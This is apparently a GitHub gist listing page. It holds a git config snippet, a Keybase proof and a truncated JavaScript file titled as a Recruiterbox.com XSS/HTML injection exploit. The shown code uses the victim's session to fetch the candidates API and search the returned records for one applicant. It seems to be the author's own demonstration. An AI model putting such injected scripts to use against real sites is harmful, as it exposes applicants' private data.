@djadmin
djadmin / config
Created Jan 16, 2016
Sync master with gh-pages branch
View config
$ vim .git/config
push = +refs/heads/master:refs/heads/gh-pages
push = +refs/heads/master:refs/heads/master
View keybase.md

Keybase proof

I hereby claim:

  • I am djadmin on github.
  • I am djadmin (https://keybase.io/djadmin) on keybase.
  • I have a public key ASBLZvlfekLas6TmwWb9gY2awd79PVfROH9v4DsZadSzvwo

To claim this, I am signing this object:

@djadmin
djadmin / recruiterbox_exploit.js
Last active Aug 10, 2016
Recruiterbox.com HTML Injection Exploit
View recruiterbox_exploit.js
// Below code was used to demonstrate hiring made so easy - Recruiterbox XSS.
var candidates = [];
var request = new XMLHttpRequest();
request.open('GET', '/api/v1/candidates/', true);
request.onload = function() {
  var data = JSON.parse(request.responseText);
  console.log(data);
  candidates = data && data.objects;
  var profile = candidates.find(function (cand) {
    return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi';